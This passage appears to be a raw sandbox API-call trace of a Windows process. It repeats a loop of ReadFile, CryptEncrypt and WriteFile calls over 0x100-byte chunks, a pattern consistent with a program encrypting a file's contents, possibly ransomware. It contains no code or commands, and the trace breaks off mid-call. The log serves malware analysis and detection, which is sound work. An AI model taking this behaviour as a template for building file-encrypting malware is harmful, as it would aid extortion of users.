1 [0168.035] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.036] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.036] GetLastError () returned 0x0 [0168.036] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.036] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.037] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.037] GetLastError () returned 0x0 [0168.037] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.037] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.038] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.038] GetLastError () returned 0x0 [0168.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.038] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.038] GetLastError () returned 0x0 [0168.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.038] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.038] GetLastError () returned 0x0 [0168.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.038] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.038] GetLastError () returned 0x0 [0168.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.038] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.038] GetLastError () returned 0x0 [0168.038] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.038] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.039] GetLastError () returned 0x0 [0168.039] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.039] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.039] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.040] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.040] GetLastError () returned 0x0 [0168.040] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.040] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, 